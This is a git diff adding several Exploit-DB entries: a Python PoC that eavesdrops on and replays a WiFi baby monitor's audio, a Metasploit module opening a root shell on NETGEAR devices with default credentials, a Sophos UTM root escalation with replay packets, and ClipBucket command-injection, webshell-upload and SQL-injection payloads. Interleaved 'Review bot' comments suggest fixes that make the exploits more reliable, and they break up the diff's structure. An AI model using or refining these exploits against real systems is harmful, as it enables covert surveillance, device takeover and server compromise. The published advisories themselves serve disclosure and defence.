diff --git a/exploits/android/remote/44242.md b/exploits/android/remote/44242.md
new file mode 100644
index 000000000..0a6414b78
--- /dev/null
+++ b/exploits/android/remote/44242.md
@@ -0,0 +1,166 @@
+Whilst analysing a number of free communication based applications on the Google Play Store, I took a look at WiFi Baby Monitor: Free & Lite (the free version of WiFi Baby Monitor). Although the premium version offered users the ability to specify a password to be used in the pairing process, the free version offered no such function.
+
+Monitoring the traffic using Wireshark during the pairing process revealed:
+
+- The initial connection is made on port 8257
+- To start the pairing process, the same sequence is sent each time
+- After the pairing process is finished, another connection is opened to port 8258, where the audio data will be transmitted
+- After the connection is made to port 8258, the connection on port 8257 is kept open and used as a heartbeat for the session
+- On the heartbeat connection, the client will periodically send 0x01 to the baby monitor (roughly once per second)
+
+## Abusing The Protocol to Record Audio
+
+With the pairing process reversed, it was possible to create a proof of concept which proved that it was possible to deploy a small program into a compromised network which would eavesdrop on a baby monitor and allow for an attacker to play the recording back at a later date at their discretion.
+
+The [very hacky] proof of concept code can be found below:
+
+```
+import socket
+import sys
+import time
+
+if len(sys.argv) < 2:
+ print "Usage: python {file} target_ip [port]".format(file = sys.argv[0])
+ exit(1)
+
+target = sys.argv[1]
+port = 8257
+
+if len(sys.argv) == 3:
+ port = int(sys.argv[2])
+
+s = socket.socket()
+s.connect((target, port))
+s.send('\x01')
+s.send('\x02\x64\x00\x00\x00\x13\x2b\x52\x65\x63\x65\x69\x76\x65\x72\x53' +
+ '\x74\x61\x72\x74\x5f\x32\x2e\x30\x32\x00\x00\x00\x00\x03\x23\x31' +
+ '\x30\x00\x00\x00\x00\x03\x23\x32\x30\x00\x00\x00\x00\x03\x23\x32' +
+ '\x31\x00\x00\x00\x00\x03\x23\x32\x32\x00\x00\x00\x00\x03\x23\x32' +
+ '\x33')
+
+heartbeat_dump = open('dump.heartbeat.bin', 'wb')
+data_dump = open('dump.data.bin', 'wb')
+
+has_data_socket = False
+data_socket = socket.socket()
+delta = 0
+
+while True:
+ time.sleep(1)
+ data = s.recv(2048)
+ if data is not None:
+ heartbeat_dump.write(data)
+ print '[*] Received {bytes} bytes on heartbeat socket'.format(bytes = len(data))
+ s.send('\x01')
+
+ if has_data_socket:
+ data = data_socket.recv(2048)
+ if data is not None:
+ data_dump.write(data)
+ print '[*] Received {bytes} bytes on data socket'.format(bytes = len(data))
+ data_socket.send('\x01')
+ else:
+ print '[*] Establishing data connection'
+ data_socket.connect((target, 8258))
+ data_socket.send('\x01')
+ data_socket.send('\x02\x64\x00\x00\x00\x07\x33\x5f\x5f\x30\x30\x30\x30')
+ has_data_socket = True
+ print '[*] Established data connection'
+
+ delta += 1
+
+heartbeat_dump.close
+data_dump.close
+```
+
+This script establishes a connection to the baby monitor and begins to dump out the data from port 8257 to dump.heartbeat.bin and the data from port 8258 to dump.data.bin.
+
+Replaying the Recordings
+In order to replay the recordings made by the proof of concept, I created a second script which would act as a baby monitor and replay the data back to a client; which allows for replay via the original application:
+
+```
+import socket
+import sys
+import time
+
+s = socket.socket()
+s.bind(('0.0.0.0', 8257))
+s.listen(5)
+print '[*] Heartbeat socket listening on port 8257'
+
+data_socket = socket.socket()
+data_socket.bind(('0.0.0.0', 8258))
+data_socket.listen(5)
+print '[*] Data socket listening on port 8258'
+
+data = ''
+with open('dump.heartbeat.bin', 'r') as replay_file:
+ data = replay_file.read()
+
+wav_data = ''
+with open('dump.data.bin', 'r') as wav_file:
+ wav_data = wav_file.read()
+
+c, addr = s.accept()
+print '[*] Connection from {client}'.format(client = addr)
+c.send(data)
+
+data_connection, addr = data_socket.accept()
+print '[*] Data connection from {client}'.format(client = addr)
+data_connection.send(wav_data)
+
+buf_start = 0
+buf_end = wav_data.find('\x00\x00\x00\x01', 1)
+buf = wav_data[buf_start:buf_end]
+
+while buf is not None:
+ c.send('\x01')
+ print '[*] Sending {bytes} bytes'.format(bytes = len(buf))
+ data_connection.send(buf)
+ time.sleep(0.1)
+
+ if buf_end == -1 or buf_start == -1:
+ buf = None
+ else:
+ buf_start = buf_end
+ buf_end = wav_data.find('\x00\x00\x00\x01', buf_end + 1)
+ if buf_end == -1:
+ buf = wav_data[buf_start:]
+ else:
+ buf = wav_data[buf_start:buf_end]
+
+data_connection.close()
+c.close()
+print '[*] Connection closed'
+```
+
+A demonstration of the replay script accepting a connection from a client and replaying a recording can be seen below:
+
+https://vimeo.com/258487598
+
+## Solution
+
+When notified, the vendor took the [respectably] responsible approach and made available to the free version the security features that were previously exclusive to the premium version.
+
+To prevent this attack, users can simply update to the latest version of the application (v2.02.2, at the time of writing this).
+
+## CVE-ID
+
+CVE-2018-7661
+
+## CVSS Score
+
+CVSS Base Score: 5.9
+Impact Subscore: 4.2
+Exploitability Subscore: 1.6
+CVSS Temporal Score: 5.3
+Overall CVSS Score: 5.3
+Vector: AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H/E:P/RL:O/RC:C
+
+## Disclosure Timeline
+
+2018-02-11: Initial contact with vendor to make them aware of the attack vector
+2018-02-12: Vendor acknowledged the issue and provided keys to test the premium version to verify the encryption and password protection would resolve the issue
+2018-02-15: Confirmation sent to vendor to let them know the proposed solution should nullify the attack
+2018-02-16: Vendor begins roll-out process for the new update
+2018-02-22: Roll-out process completed and version 2.02.2 made available to the public
\ No newline at end of file
diff --git a/exploits/hardware/remote/44245.rb b/exploits/hardware/remote/44245.rb
new file mode 100755
index 000000000..24f6dede7
--- /dev/null
+++ b/exploits/hardware/remote/44245.rb
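Review bot: The recorder loop in the first script never notices the monitor hanging up, because `s.recv(2048)` and `data_socket.recv(2048)` return `''` on EOF rather than `None`, so `if data is not None` is always true and the script keeps writing empty chunks and sending `\x01` into a dead connection until `send` eventually raises; `if not data: break` on both checks (and closing the sockets after the loop) ends the capture cleanly. The trailing `heartbeat_dump.close` / `data_dump.close` are attribute references, not calls — they need `()` to flush and close the dump files, though as written the `while True` has no exit so they are never reached anyway. The PoC is Python 2 (print statements, `str` payloads passed to `send`); a one-line note saying so would save readers a failed run under Python 3.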
@@ -0,0 +1,242 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Udp
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::Capture
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'NETGEAR TelnetEnable',
+ 'Description' => %q{
+ This module sends a magic packet to a NETGEAR device to enable telnetd.
+ Upon successful connect, a root shell should be presented to the user.
+ },
+ 'Author' => [
+ 'Paul Gebheim', # Python PoC (TCP)
+ 'insanid', # Python PoC (UDP)
+ 'wvu', # Metasploit module
+ ],
+ 'References' => [
+ ['URL', 'https://wiki.openwrt.org/toh/netgear/telnet.console'],
+ ['URL', 'https://github.com/cyanitol/netgear-telenetenable'],
+ ['URL', 'https://github.com/insanid/netgear-telenetenable']
+ ],
+ 'DisclosureDate' => 'Oct 30 2009', # Python PoC (TCP)
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Privileged' => true,
+ 'Payload' => {
+ 'Compat' => {
+ 'PayloadType' => 'cmd_interact',
+ 'ConnectionType' => 'find'
+ }
+ },
+ 'Targets' => [
+ ['Automatic (detect TCP or UDP)',
+ proto: :auto
+ ],
+ ['TCP (typically older devices)',
+ proto: :tcp,
+ username: 'Gearguy',
+ password: 'Geardog'
+ ],
+ ['UDP (typically newer devices)',
+ proto: :udp,
+ username: 'admin',
+ password: 'password'
+ ]
+ ],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options([
+ Opt::RPORT(23),
+ OptString.new('MAC', [false, 'MAC address of device']),
+ OptString.new('USERNAME', [false, 'Username on device']),
+ OptString.new('PASSWORD', [false, 'Password on device'])
+ ])
+ end
+
+ def check
+ # Run through protocol detection
+ detect_proto
+
+ # This is a gamble, but it's the closest we can get
+ if @proto == :tcp
+ CheckCode::Detected
+ else
+ CheckCode::Unknown
+ end
+ end
+
+ def exploit
+ # Try to do the exploit unless telnetd is detected
+ @do_exploit = true
+
+ # Detect TCP or UDP and presence of telnetd
+ @proto = target[:proto]
+ detect_proto if @proto == :auto
+
+ # Use supplied or ARP-cached MAC address
+ configure_mac if @do_exploit
+
+ # Use supplied or default creds
+ configure_creds if @do_exploit
+
+ # Shell it
+ exploit_telnetenabled if @do_exploit
+ connect_telnetd
+ end
+
+ def detect_proto
+ begin
+ connect
+
+ res = begin
+ sock.get_once || ''
+ rescue EOFError
+ ''
+ end
+
+ # telnetenabled returns no data, unlike telnetd
+ if res.length == 0
+ print_good('Detected telnetenabled on TCP')
+ else
+ print_good('Detected telnetd on TCP')
+ @do_exploit = false
+ end
+
+ @proto = :tcp
+ # It's UDP... and we may not get an ICMP error...
+ rescue Rex::ConnectionError
+ print_good('Detected telnetenabled on UDP')
+ @proto = :udp
+ ensure
+ disconnect
+ end
+ end
+
+ def configure_mac
+ @mac = datastore['MAC']
+
+ return if @mac
+
+ print_status('Attempting to discover MAC address via ARP')
+
+ begin
+ open_pcap
+ @mac = lookup_eth(rhost).first
+ rescue RuntimeError
+ fail_with(Failure::BadConfig, 'Superuser access required')
+ ensure
+ close_pcap
+ end
+
+ if @mac
+ print_good("Found MAC address #{@mac}")
+ else
+ fail_with(Failure::Unknown, 'Could not find MAC address')
+ end
+ end
+
+ def configure_creds
+ @username = datastore['USERNAME'] || target[:username]
+ @password = datastore['PASSWORD'] || target[:password]
+
+ # Try to use default creds if no creds were found
+ unless @username && @password
+ tgt = targets.find { |t| t[:proto] == @proto }
+ @username = tgt[:username]
+ @password = tgt[:password]
+ end
+
+ print_good("Using creds #{@username}:#{@password}")
+ end
+
+ def exploit_telnetenabled
+ print_status('Generating magic packet')
+ payload = magic_packet(@mac, @username, @password)
+
+ begin
+ print_status("Connecting to telnetenabled via #{@proto.upcase}")
+ @proto == :tcp ? connect : connect_udp
+ print_status('Sending magic packet')
+ @proto == :tcp ? sock.put(payload) : udp_sock.put(payload)
+ rescue Rex::ConnectionError
+ fail_with(Failure::Disconnected, 'Something happened mid-connection!')
+ ensure
+ print_status('Disconnecting from telnetenabled')
+ @proto == :tcp ? disconnect : disconnect_udp
+ end
+
+ # Wait a couple seconds for telnetd to come up
+ print_status('Waiting for telnetd')
+ sleep(2)
+ end
+
+ def connect_telnetd
+ print_status('Connecting to telnetd')
+ connect
+ handler(sock)
+ end
+
+ # NOTE: This is almost a verbatim copy of the Python PoC
+ def magic_packet(mac, username, password)
+ mac = mac.gsub(/[:-]/, '').upcase
+
+ if mac.length != 12
+ fail_with(Failure::BadConfig, 'MAC must be 12 bytes without : or -')
+ end
+ just_mac = mac.ljust(0x10, "\x00")
+
+ if username.length > 0x10
+ fail_with(Failure::BadConfig, 'USERNAME must be <= 16 bytes')
+ end
+ just_username = username.ljust(0x10, "\x00")
+
+ if @proto == :tcp
+ if password.length > 0x10
+ fail_with(Failure::BadConfig, 'PASSWORD must be <= 16 bytes')
+ end
+ just_password = password.ljust(0x10, "\x00")
+ elsif @proto == :udp
+ # Thanks to Roberto Frenna for the reserved field analysis
+ if password.length > 0x21
+ fail_with(Failure::BadConfig, 'PASSWORD must be <= 33 bytes')
+ end
+ just_password = password.ljust(0x21, "\x00")
+ end
+
+ cleartext = (just_mac + just_username + just_password).ljust(0x70, "\x00")
+ md5_key = Rex::Text.md5_raw(cleartext)
+
+ payload = byte_swap((md5_key + cleartext).ljust(0x80, "\x00"))
+
+ secret_key = 'AMBIT_TELNET_ENABLE+' + password
+
+ byte_swap(blowfish_encrypt(secret_key, payload))
+ end
+
+ def blowfish_encrypt(secret_key, payload)
+ cipher = OpenSSL::Cipher.new('bf-ecb').encrypt
+
+ cipher.padding = 0
+ cipher.key_len = secret_key.length
+ cipher.key = secret_key
+
+ cipher.update(payload) + cipher.final
+ end
+
+ def byte_swap(data)
+ data.unpack('N*').pack('V*')
+ end
+
+end
\ No newline at end of file
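Review bot: `magic_packet` strips `:`/`-` and checks `mac.length != 12`, but never checks that what remains is hex, so a typo such as `00:11:22:33:44:GG` passes validation and the device silently ignores a packet built from the wrong MAC; `unless mac =~ /\A\h{12}\z/` followed by `fail_with(Failure::BadConfig, 'MAC must be 12 hex digits (separators optional)')` closes that and also fixes the misleading "12 bytes without : or -" message, since separators are already accepted on the line above. In `detect_proto`, any `Rex::ConnectionError` on port 23 — including a host with nothing listening at all — is announced with `print_good('Detected telnetenabled on UDP')`; that is an assumption rather than a detection, and `print_status('TCP connect to 23 failed, assuming UDP telnetenabled')` would describe it honestly (`check` already returns `Unknown` for this branch, which is consistent). `configure_creds` echoes the password in clear via `print_good`, which lands in console logs; `vprint_good` or masking it is the usual courtesy. `OpenSSL::Cipher.new('bf-ecb')` also depends on Blowfish being present in the Ruby OpenSSL build — newer OpenSSL releases move it to a legacy provider — so rescuing that constructor with a clear "Blowfish not available" failure would help users who hit it.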
diff --git a/exploits/linux/local/44246.txt b/exploits/linux/local/44246.txt
new file mode 100644
index 000000000..4b8f07a3c
--- /dev/null
+++ b/exploits/linux/local/44246.txt
@@ -0,0 +1,183 @@
+KL-001-2018-007 : Sophos UTM 9 loginuser Privilege Escalation via confd Service
+
+Title: Sophos UTM 9 loginuser Privilege Escalation via confd Service
+Advisory ID: KL-001-2018-007
+Publication Date: 2018.03.02
+Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-007.txt
+
+
+1. Vulnerability Details
+
+ Affected Vendor: Sophos
+ Affected Product: UTM 9
+ Affected Version: 9.410
+ Platform: Embedded Linux
+ CWE Classification: CWE-306: Missing Authentication for Critical Function (SID generation)
+ Impact: Privilege Escalation
+ Attack vector: SSH
+
+2. Vulnerability Description
+
+ The attacker must know the password for the loginuser
+ account. The confd client is not available to the loginuser
+ account. However, the running service is accessible over
+ a network port on the loopback interface. By replaying the
+ network traffic required to obtain a SID from this service it
+ is possible to escalate privileges to root.
+
+3. Technical Description
+
+ 1. Obtain the a privileged session token
+
+ $ ssh -Nf -L 127.0.0.1:4472:127.0.0.1:4472 loginuser@1.3.3.7
+ loginuser@1.3.3.7's password:
+ $ python kl-loginuser-confd-priv_esc.py
+ pojiZSqWEUAUDNIQtSop
+
+ 2. Using that session token, set the root password
+
+ POST /webadmin.plx HTTP/1.1
+ Host: 1.3.3.7:4444
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0
+ Accept: text/javascript, text/html, application/xml, text/xml, */*
+ Accept-Language: en-US,en;q=0.5
+ X-Requested-With: XMLHttpRequest
+ X-Prototype-Version: 1.5.1.1
+ Content-Type: application/json; charset=UTF-8
+ Referer: https://1.3.3.7:4444/
+ Content-Length: 422
+ Cookie: SID=pojiZSqWEUAUDNIQtSop
+ DNT: 1
+ Connection: close
+
+ {"objs": [{"ack": null, "elements": {"root_pw_1": "korelogic", "root_pw_2": "korelogic", "loginuser_pw_1":
+"loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "pojiZSqWEUAUDNIQtSop", "browser":
+"gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID":
+"1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false}
+
+ HTTP/1.1 200 OK
+ Date: Thu, 23 Mar 2017 15:33:53 GMT
+ Server: Apache
+ Expires: Thursday, 01-Jan-1970 00:00:01 GMT
+ Pragma: no-cache
+ X-Frame-Options: SAMEORIGIN
+ X-Content-Type-Option: nosniff
+ X-XSS-Protection: 1; mode=block
+ Vary: Accept-Encoding
+ Connection: close
+ Content-Type: application/json; charset=utf-8
+ Content-Length: 178895
+
+ {"SID":"pojiZSqWEUAUDNIQtSop","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba",[snip over 9000]
+
+ 3. Look for success message.
+
+ "objs":[{"success":[{"text":"Shell user password(s) set successfully."}]
+
+ 4. Profit.
+
+ loginuser@[redacted]:/home/login > su
+ Password:
+ [redacted]:/home/login # id
+ uid=0(root) gid=0(root) groups=0(root),890(xorp)
+
+4. Mitigation and Remediation Recommendation
+
+ The vendor has addressed this vulnerability in version
+ 9.508. Release notes and download instructions can be found at:
+
+ https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-508-released
+
+
+5. Credit
+
+ This vulnerability was discovered by Matt Bergin (@thatguylevel)
+ of KoreLogic, Inc.
+
+6. Disclosure Timeline
+
+ 2017.07.21 - KoreLogic submits vulnerability details to Sophos.
+ 2017.07.21 - Sophos acknowledges receipt.
+ 2017.09.01 - 30 business days have elapsed since the vulnerability
+ was reported to Sophos.
+ 2017.09.15 - KoreLogic requests an update on the status of this and
+ other vulnerabilities reported to Sophos.
+ 2017.09.18 - Sophos informs KoreLogic that this issue will require
+ additional engineering and requests an extension of
+ the disclosure timeline.
+ 2017.09.25 - 45 business days have elapsed since the vulnerability
+ was reported to Sophos.
+ 2017.11.07 - 75 business days have elapsed since the vulnerability
+ was reported to Sophos.
+ 2017.12.14 - 100 business days have elapsed since the vulnerability
+ was reported to Sophos.
+ 2018.01.12 - KoreLogic requests an update from Sophos.
+ 2018.01.15 - Sophos informs KoreLogic that the expected release date
+ for the UTM 9.5 MR 6 version containing the mitigation
+ is the middle of February.
+ 2018.01.16 - 120 business days have elapsed since the vulnerability
+ was reported to Sophos.
+ 2018.02.28 - 150 business days have elapsed since the vulnerability
+ was reported to Sophos.
+ 2018.03.01 - UTM 9.508 released by Sophos.
+ 2018.03.02 - KoreLogic public disclosure.
+
+7. Proof of Concept
+
+from socket import socket,AF_INET,SOCK_STREAM
+
+class Exploit:
+ def __init__(self):
+ self.host = '127.0.0.1'
+ self.port = 4472
+ self.connected = False
+ self.s = None
+ return None
+ def disconnect(self):
+ self.s.close()
+ return True
+ def send_trigger(self):
+ packet_one =
+'00000039050702000000050a0a43616c6c4d6574686f6404110b41737461726f3a3a52504303000000000a036765740a04697076360a06737461747573'.decode('hex')
+ self.s.send(packet_one)
+ self.s.recv(4096)
+ packet_two =
+'00000099050702000000040a094e657748616e646c650a037379730a036e65770403000000060a0f636f6e66642d636c69656e742e706c00000006636c69656e7417000000000870617373776f72640a093132372e302e302e31000000066173675f69700a093132372e302e302e31000000026970170673797374656d00000008757365726e616d65170673797374656d00000008666163696c697479'.decode('hex')
+ self.s.send(packet_two)
+ self.s.recv(4096)
+ packet_three =
+'0000002f05070200000003170a43616c6c4d6574686f6404110b41737461726f3a3a525043030000000017076765745f534944'.decode('hex')
+ self.s.send(packet_three)
+ print self.s.recv(4096).strip()
+ return True
+ def connect(self):
+ self.s = socket(AF_INET, SOCK_STREAM)
+ self.s.connect((self.host,self.port))
+ self.connected = True
+ return True
+ def run(self):
+ self.connect()
+ self.send_trigger()
+ self.disconnect()
+ return True
+
+if __name__=="__main__":
+ Exploit().run()
+
+
+The contents of this advisory are copyright(c) 2018
+KoreLogic, Inc. and are licensed under a Creative Commons
+Attribution Share-Alike 4.0 (United States) License:
+http://creativecommons.org/licenses/by-sa/4.0/
+
+KoreLogic, Inc. is a founder-owned and operated company with a
+proven track record of providing security services to entities
+ranging from Fortune 500 to small and mid-sized companies. We
+are a highly skilled team of senior security consultants doing
+by-hand security assessments for the most important networks in
+the U.S. and around the world. We are also developers of various
+tools and resources aimed at helping the security community.
+https://www.korelogic.com/about-korelogic.html
+
+Our public vulnerability disclosure policy is available at:
+https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
\ No newline at end of file
diff --git a/exploits/multiple/dos/44247.txt b/exploits/multiple/dos/44247.txt
new file mode 100644
index 000000000..45413c473
--- /dev/null
+++ b/exploits/multiple/dos/44247.txt
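Review bot: The three replayed blobs in `send_trigger` are the whole substance of the finding, yet nothing says what they carry; decoding the hex shows `packet_one` is a `CallMethod Astaro::RPC get ipv6 status` probe, `packet_two` a serialized `NewHandle sys new` request whose hash holds `client => confd-client.pl`, `username => system`, `facility => system`, `asg_ip`/`ip => 127.0.0.1` and an empty `password`, and `packet_three` a `CallMethod Astaro::RPC get_SID` — i.e. confd issues a system-facility SID to any loopback client that merely asserts that identity, which is exactly the CWE-306 claim in section 1. A one-line comment above each `packet_*` assignment saying so would let a reader verify the advisory without a hex decoder. As pasted, the `packet_one =` / `packet_two =` / `packet_three =` assignments are split across two lines by the advisory's wrapping, so section 7 is a `SyntaxError` until the hex literal is rejoined to its `=` (or the first line ends with `\`). `self.s.recv(4096)` also assumes each reply arrives in a single read; that is probably fine over loopback, but a short read would desynchronise the replay, so a note or a length-prefixed read loop would make the PoC sturdier.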
@@ -0,0 +1,57 @@
+-----------------------------------------------------
+Vulnerability Type: Detection Bypass
+Affected Product: Suricata
+Vulnerable version: <4.0.4
+CVE number: CVE-2018-6794
+Found: 25.01.2018
+By: Kirill Shipulin (@kirill_wow), Positive Technologies
+Severity: Medium
+------------------------------------------
+
+About Suricata:
+---------------
+Suricata is a high performance Network Threat Detection, IDS, IPS and Network Security Monitoring engine. Open Source and owned by a community run non-profit foundation, the Open Information Security Foundation (OISF). Suricata is developed by the OISF, its supporting vendors and the community
+
+Attack Description:
+-------------------
+If as a server side you break a normal TCP 3 way handshake packets order and inject some response data before 3whs is complete then data still will be received by the a client but some IDS engines may skip content checks on that.
+
+Attack scenario TCP flow scheme:
+Client -> [SYN] [Seq=0 Ack= 0] -> Evil Server
+Client <- [SYN, ACK] [Seq=0 Ack= 1] <- Evil Server
+Client <- [PSH, ACK] [Seq=1 Ack= 1] <- Evil Server # Injection before the 3whs is completed
+Client <- [FIN, ACK] [Seq=83 Ack= 1] <- Evil Server
+Client -> [ACK] [Seq=1 Ack= 84] -> Evil Server
+Client -> [PSH, ACK] [Seq=1 Ack= 84] -> Evil Server
+
+IDS signature checks for tcp stream or http response body will be skipped in the case of data injection. This attack technique requires all three packets from a malicious server to be received by a client side together before it completes 3whs. Proof of concept server was written in C to reproduce this and it works reliably in local networks. Since some network devices may affect packets transmission exploitation is not so reliable for the internet scenario.
+
+This attack possibly may impact other network monitoring or intrusion detection systems because is not limited to Suricata IDS: an old Snort IDS version 2.9.4 is also affected.
+
+Successful exploitation leads to a complete TCP-Stream response or HTTP response signatures bypass and may be used to prevent malicious payloads from network detection.
+
+PoС:
+----
+A Working PoC server is available here: https://github.com/kirillwow/ids_bypass
+There is also a traffic capture of this data injection technique.
+
+Timeline Summary:
+-----------------
+2018-01-25: Issue submitted to the bug tracker.
+2018-01-30: Patch ready.
+2018-02-14: Suricata 4.0.4 containing the fix has been released.
+
+References:
+-----------
+CVE-2018-6794
+https://redmine.openinfosecfoundation.org/issues/2427
+
+Contacts:
+---------
+Twitter: https://twitter.com/AttackDetection
+Twitter: https://twitter.com/kirill_wow
+Telegram: https://t.me/kirill_wow
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44247.zip
\ No newline at end of file
diff --git a/exploits/php/webapps/44250.txt b/exploits/php/webapps/44250.txt
new file mode 100644
index 000000000..28d80463a
--- /dev/null
+++ b/exploits/php/webapps/44250.txt
@@ -0,0 +1,245 @@
+SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
+=======================================================================
+ title: OS command injection, arbitrary file upload & SQL injection
+ product: ClipBucket
+ vulnerable version: <4.0.0 - Release 4902
+ fixed version: 4.0.0 - Release 4902
+ CVE number: -
+ impact: critical
+ homepage: http://clipbucket.com/
+ found: 2017-09-06
+ by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
+ Wan Ikram (Office Kuala Lumpur)
+ Fikri Fadzil (Office Kuala Lumpur)
+ Jasveer Singh (Office Kuala Lumpur)
+ SEC Consult Vulnerability Lab
+
+ An integrated part of SEC Consult
+ Bangkok - Berlin - Linz - Luxembourg - Montreal
+ Moscow - Munich - Kuala Lumpur - Singapore
+ Vienna (HQ) - Vilnius - Zurich
+
+ https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"ClipBucket is a free and open source software which helps us to create a
+complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
+in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
+team of developers. ClipBucket was developed as a YouTube clone but has been
+upgraded with advanced features and enhancements. It uses FFMPEG for video
+conversion and thumbs generation which is the most widely used application so,
+users can stream it straight away using the Video JS and HTML 5 Players."
+
+Source: https://clipbucket.com/about
+
+
+Business recommendation:
+------------------------
+By exploiting the vulnerabilities documented in this advisory, an attacker can
+fully compromise the web server which has ClipBucket installed. Potentially
+sensitive data might get exposed through this attack.
+
+Users are advised to immediately install the patched version provided by the
+vendor.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1. Unauthenticated OS Command Injection
+Any OS commands can be injected by an unauthenticated attacker. This is a serious
+vulnerability as the chances for the system to be fully compromised is very
+high. This same vulnerability can also be exploited by authenticated attackers
+with normal user privileges.
+
+2. Unauthenticated Arbitrary File Upload
+A malicious file can be uploaded into the webserver by an unauthenticated
+attacker. It is possible for an attacker to upload a script to issue operating
+system commands. This same vulnerability can also be exploited by an
+authenticated attacker with normal user privileges.
+
+3. Unauthenticated Blind SQL Injection
+The identified SQL injection vulnerabilities enable an attacker to execute
+arbitrary SQL commands on the underlying MySQL server.
+
+
+Proof of concept:
+-----------------
+1. Unauthenticated OS Command Injection
+Without having to authenticate, an attacker can exploit this vulnerability
+by manipulating the "file_name" parameter during the file upload in the script
+/api/file_uploader.php:
+
+ $ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<>"
+http://$HOST/api/file_uploader.php
+
+
+Alternatively, this vulnerability can also be exploited by authenticated basic
+privileged users with the following payload by exploiting the same issue in
+/actions/file_downloader.php:
+
+$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4&file_name=abc
+|| <>" "http://$HOST/actions/file_downloader.php"
+
+
+2. Unauthenticated Arbitrary File Upload
+Below is the cURL request to upload arbitrary files to the webserver with no
+authentication required.
+
+$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
+"http://$HOST/actions/beats_uploader.php"
+
+$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
+"http://$HOST/actions/photo_uploader.php"
+
+Furthermore, this vulnerability is also available to authenticated users with
+basic privileges:
+
+$ curl --cookie "[--SNIP--]" -F
+"coverPhoto=@valid-image-with-appended-phpcode.php"
+"http://$HOST/edit_account.php?mode=avatar_bg"
+
+
+3. Unauthenticated Blind SQL Injection
+The following parameters have been identified to be vulnerable against
+unauthenticated blind SQL injection.
+
+URL : http://$HOST/actions/vote_channel.php
+METHOD : POST
+PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())
+
+The source code excerpt below shows the vulnerable code
+VULN. FILE : /actions/vote_channel.php
+VULN. CODE :
+[...]
+$vote = $_POST["vote"];
+$userid = $_POST["channelId"];
+//if($userquery->login_check('',true)){
+if($vote == "yes"){
+ $query = "UPDATE " . tbl("users") . " SET voted = voted + 1, likes = likes + 1
+WHERE userid = {$userid}";
+}else{
+ //$query = "UPDATE " . tbl("users") . " SET likes = likes (- 1) WHERE userid =
+{$userid}";
+ $sel = "Select userid,username,likes From ".tbl("users")." WHERE userid =
+{$userid}";
+ $result = $db->Execute($sel);
+ foreach ($result as $row )
+ $current_likes = $row['likes'];
+ $decremented_like = $current_likes-1;
+ $query = "Update ".tbl("users")." Set likes = $decremented_like Where userid
+= $userid";
+}
+[...]
+
+URL : http://$HOST/ajax/commonAjax.php
+METHOD : POST
+PAYLOAD : mode=emailExists&email=1' or '1'='1
+
+The source code excerpt below shows the vulnerable code
+VULN. FILE : /ajax/commonAjax.php
+VULN. CODE :
+[...]
+$email = $_POST['email'];
+$check = $db->select(tbl('users'),"email"," email='$email'");
+if (!$check) {
+ echo "NO";
+}
+[...]
+
+URL : http://$HOST/ajax/commonAjax.php
+METHOD : POST
+PAYLOAD : mode=userExists&username=1' or '1'='1
+
+The source code excerpt below shows the vulnerable code
+VULN. FILE : /ajax/commonAjax.php
+VULN. CODE :
+[...]
+$username = $_POST['username'];
+$check = $db->select(tbl('users'),"username"," username='$username'");
+if (!$check) {
+ echo "NO";
+}
+[...]
+
+
+Vulnerable / tested versions:
+-----------------------------
+Clipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were
+the latest at the time the security vulnerabilities were discovered.
+
+
+Vendor contact timeline:
+------------------------
+2017-10-17: Contacting vendor through email.
+2017-10-18: Vendor asking for additional details.
+2017-10-19: Replied to vendor.
+2017-10-26: Request update from vendor, no response.
+2017-11-09: Request update from vendor.
+2017-11-09: Vendor response with security patches.
+2017-11-10: Notified vendor the security patches don't fix the reported issues
+2017-11-30: Request update from vendor.
+2017-11-30: Vendor requesting for support via Skype
+2017-12-07: Response to vendor.
+2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again
+2018-01-22: Vendor provides latest patches, scheduled for future release
+2018-01-26: Verified that the patches don't fully mitigate all issues.
+2018-01-29: Request update from vendor, no response.
+2018-02-06: Request update from vendor, no response.
+2018-02-08: Informing vendor of public release date
+2018-02-08: Vendor: Stable v4.0 including security fixes will be released in
+ two weeks; postponing once again for two weeks
+2018-02-23: Request update from vendor.
+2018-02-26: Vendor publishes v4.0
+2018-02-27: Public release of security advisory
+
+
+
+Solution:
+---------
+The vendor provided the following patched version:
+https://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip
+
+
+Workaround:
+-----------
+None
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
+
+
